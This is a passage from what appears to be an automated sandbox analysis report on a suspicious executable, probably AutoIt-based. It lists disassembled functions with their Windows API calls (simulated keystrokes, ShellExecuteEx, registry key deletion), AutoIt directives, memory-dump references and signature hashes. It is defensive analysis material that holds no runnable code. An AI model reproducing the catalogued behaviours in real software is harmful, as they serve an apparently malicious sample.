                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00928F03
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00928F3F
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00928F50
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0092BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00928F8A
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00928FAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: 9cc2cc3113a78b40de1e685f3b0fe8582d5a310913173529f6fa11b709821a42
                                                                              • Instruction ID: d9dc8e9135d3af91b11e29b5fcd180b5c0b9ca62656342878e3acbce123683d1
                                                                              • Opcode Fuzzy Hash: 9cc2cc3113a78b40de1e685f3b0fe8582d5a310913173529f6fa11b709821a42
                                                                              • Instruction Fuzzy Hash: E9319F76216224BFEB108F50DC49FEB3BADEF4A715F054065FE089A195C6759841CBB0
                                                                              Function 009116DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                              • _wcstok.LIBCMT ref: 0091184E
                                                                              • _wcscpy.LIBCMT ref: 009118DD
                                                                              • _memset.LIBCMT ref: 00911910
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              • Opcode ID: 7fd7c0cf9698c0798015cca3f4dd2bcf5e47a72eba73777430b10cced80ec6d2
                                                                              • Instruction ID: 353708117c14512abe0b2cac5db22bfc24b92480034f61a569c19ca73b08c446
                                                                              • Opcode Fuzzy Hash: 7fd7c0cf9698c0798015cca3f4dd2bcf5e47a72eba73777430b10cced80ec6d2
                                                                              • Instruction Fuzzy Hash: B1C15A316043449FC724EF68C951E9AB7F4FF85350F04896DF999972A2DB30E844CB82
                                                                              Function 00930133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0093016D
                                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0093038D
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009303AB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009303D6
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009303FF
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00930421
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00930440
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                              • String ID:
                                                                              • API String ID: 3356174886-0
                                                                              • Opcode ID: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
                                                                              • Instruction ID: 487f50d104636ea22ab6d195aacafedd3a4aa8ef6555047093e4b58d6b0c45f6
                                                                              • Opcode Fuzzy Hash: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
                                                                              • Instruction Fuzzy Hash: 94A19D35600616EFDB18CF68C999BBEBBB5BF88700F048115EC59A7290E734AD60DF90
                                                                              Function 008DAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abba3a587bb96fc82fb0e230a383913b8349baeecafb9e02988454b6ef087ad8
                                                                              • Instruction ID: 6dd6d792ddf0d9e76c8379eb30c0e85e2109b0381b67ef5607e33416b831facc
                                                                              • Opcode Fuzzy Hash: abba3a587bb96fc82fb0e230a383913b8349baeecafb9e02988454b6ef087ad8
                                                                              • Instruction Fuzzy Hash: DD715CB5904109EFCB18CF98CC89EAEBB79FF85314F24828AF915A7251C7349A41CF65
                                                                              Function 00922230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0092225A
                                                                              • _memset.LIBCMT ref: 00922323
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00922368
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0092242F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0092243E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 4082843840-2766056989
                                                                              • Opcode ID: 28c293382a80a2b99ddf8d2b7c581687d08e4a8e90d8774bfdcc76b0cb68ad96
                                                                              • Instruction ID: 1dc5238a2745af06d3ef5dbc63c79e2d815b5d5468ed3456b5453e25a0052891
                                                                              • Opcode Fuzzy Hash: 28c293382a80a2b99ddf8d2b7c581687d08e4a8e90d8774bfdcc76b0cb68ad96
                                                                              • Instruction Fuzzy Hash: 51716D74A00629EFCF04EFA8D885A9EB7F5FF48710F108559E856AB361DB34AD40CB91
                                                                              Function 00903DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00903DE7
                                                                              • GetKeyboardState.USER32(?), ref: 00903DFC
                                                                              • SetKeyboardState.USER32(?), ref: 00903E5D
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00903E8B
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00903EAA
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00903EF0
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00903F13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 682efa0a0876a5cde5e8bef49038332d66d689b6da6fb7f6490a5065e8c33fc4
                                                                              • Instruction ID: afe983edea6455296c83edd12d2e272c53ddfdd4ad980f37a4ba0711eb2c54d3
                                                                              • Opcode Fuzzy Hash: 682efa0a0876a5cde5e8bef49038332d66d689b6da6fb7f6490a5065e8c33fc4
                                                                              • Instruction Fuzzy Hash: 2F51D3A0A187D53EFB364324CC45BB67EAD5B06304F08CA89F1D9468D2D3A8EEC4D760
                                                                              Function 00903BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 00903C02
                                                                              • GetKeyboardState.USER32(?), ref: 00903C17
                                                                              • SetKeyboardState.USER32(?), ref: 00903C78
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00903CA4
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00903CC1
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00903D05
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00903D26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 0b6fd04bb27f7eb8b4e1019e6aec9f67460413158108aa1b68f459b948e36e61
                                                                              • Instruction ID: 63d459705a9ee623ad28a2498a8481735171bf0470fd5e5f475e4d261aaf4a83
                                                                              • Opcode Fuzzy Hash: 0b6fd04bb27f7eb8b4e1019e6aec9f67460413158108aa1b68f459b948e36e61
                                                                              • Instruction Fuzzy Hash: 0C5105A05487D53DFB3287348C46BBABFAD6F06304F0CC489E5D59A8C2D694EE84E760
                                                                              Function 00907DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsncpy$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 2945705084-0
                                                                              • Opcode ID: 93137efcd088f4b32cbe422607c5b35f1f2a93b03e758826ada0509f2dec3ff9
                                                                              • Instruction ID: d9026117972a4e8e75902179e52b475c45b233792b2eb8015fc3d224c3a4ace2
                                                                              • Opcode Fuzzy Hash: 93137efcd088f4b32cbe422607c5b35f1f2a93b03e758826ada0509f2dec3ff9
                                                                              • Instruction Fuzzy Hash: 94418466C102587ACF10EBF9CC4A9CFB3ACEF06310F504966E504E3161F674E650C7A6
                                                                              Function 00923D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00923DA1
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00923DCB
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00923E80
                                                                                • Part of subcall function 00923D72: RegCloseKey.ADVAPI32(?), ref: 00923DE8
                                                                                • Part of subcall function 00923D72: FreeLibrary.KERNEL32(?), ref: 00923E3A
                                                                                • Part of subcall function 00923D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00923E5D
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00923E25
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 395352322-0
                                                                              • Opcode ID: 458071cd6d9385a8c53828080e1353898afb574812e12dcfd63b7e8825d3a8f3
                                                                              • Instruction ID: f674a6dc15863ccba4dddf6652069a521db9d6f6dbc64befa43c870b1f18be26
                                                                              • Opcode Fuzzy Hash: 458071cd6d9385a8c53828080e1353898afb574812e12dcfd63b7e8825d3a8f3
                                                                              • Instruction Fuzzy Hash: 5F315AB5911119BFDB149F90EC89EFFB7BCEF09300F00416AE512E2154D6789F899BA0
                                                                              Function 00928FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00928FE7
                                                                              • GetWindowLongW.USER32(00FBDC10,000000F0), ref: 0092901A
                                                                              • GetWindowLongW.USER32(00FBDC10,000000F0), ref: 0092904F
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00929081
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009290AB
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 009290BC
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009290D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: 0775410cf7035f7aaada0d9afc5a91823b99a93dfae763ee089b51385959cac1
                                                                              • Instruction ID: 79f88e5737b82c6fd05873c9d9f68ab9c25a4b17e6b88d2cf88fed53d4d43794
                                                                              • Opcode Fuzzy Hash: 0775410cf7035f7aaada0d9afc5a91823b99a93dfae763ee089b51385959cac1
                                                                              • Instruction Fuzzy Hash: 56315538698228EFDB20CF58EC84F6537A9FB4A314F150164FA198F2B5CB71A841EB40
                                                                              Function 009008AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009008F2
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00900918
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0090091B
                                                                              • SysAllocString.OLEAUT32(?), ref: 00900939
                                                                              • SysFreeString.OLEAUT32(?), ref: 00900942
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00900967
                                                                              • SysAllocString.OLEAUT32(?), ref: 00900975
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 268eb546f9ca9947dbf8824bd2844fbf3a460e4634059f182d95e40a553f698f
                                                                              • Instruction ID: 11a9e074c9c966af155299924469e79661b662fb25ee9ab75efcc2fd4bcff14f
                                                                              • Opcode Fuzzy Hash: 268eb546f9ca9947dbf8824bd2844fbf3a460e4634059f182d95e40a553f698f
                                                                              • Instruction Fuzzy Hash: DA21B77A605208AFDB109F68CC84EBB73ACFF49360F008525F919DB291D670EC419B60
                                                                              Function 00902472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: d0fec90143d3b5253f9ba70590b2a5cc4edfc0828698cebfa69eb608a4d43652
                                                                              • Instruction ID: e3b614e33b66b80c6e4a9d6840723f07161e858ff284db5ccf62076345ab74c9
                                                                              • Opcode Fuzzy Hash: d0fec90143d3b5253f9ba70590b2a5cc4edfc0828698cebfa69eb608a4d43652
                                                                              • Instruction Fuzzy Hash: 26217C311041516BC730EB399C0AF7773ECFF65300F10442AF946D71C2E6659942C396
                                                                              Function 00900986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009009CB
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009009F1
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 009009F4
                                                                              • SysAllocString.OLEAUT32 ref: 00900A15
                                                                              • SysFreeString.OLEAUT32 ref: 00900A1E
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00900A38
                                                                              • SysAllocString.OLEAUT32(?), ref: 00900A46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: f353534ecaa06a8da0886085f460c439baa296379290e50ffda9c2103a505637
                                                                              • Instruction ID: c943ebcf171683b034813112d26a6fdcb030b4e024647a8fb5e21298d071ad60
                                                                              • Opcode Fuzzy Hash: f353534ecaa06a8da0886085f460c439baa296379290e50ffda9c2103a505637
                                                                              • Instruction Fuzzy Hash: 5B217479315204AFDB10DFA8DC88DAA77ECFF89360B008125F909CB2E1D674EC419B64
                                                                              Function 0092A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                                • Part of subcall function 008DD17C: GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                                • Part of subcall function 008DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0092A32D
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0092A33A
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0092A345
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0092A354
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0092A360
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: 977240b3d4b20da98e65cc9ff56ef49107f586f293094613e10481492a86e42b
                                                                              • Instruction ID: f4a5469445ff7b26214760e8c3093365567109dfe23bb8699348064b8e8cb4fb
                                                                              • Opcode Fuzzy Hash: 977240b3d4b20da98e65cc9ff56ef49107f586f293094613e10481492a86e42b
                                                                              • Instruction Fuzzy Hash: 461193B2150229BFEF119FA4DC85EEB7F6DFF09798F014115BA08A6060C7729C21DBA4
                                                                              Function 008DCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 008DCCF6
                                                                              • GetWindowRect.USER32(?,?), ref: 008DCD37
                                                                              • ScreenToClient.USER32(?,?), ref: 008DCD5F
                                                                              • GetClientRect.USER32(?,?), ref: 008DCE8C
                                                                              • GetWindowRect.USER32(?,?), ref: 008DCEA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
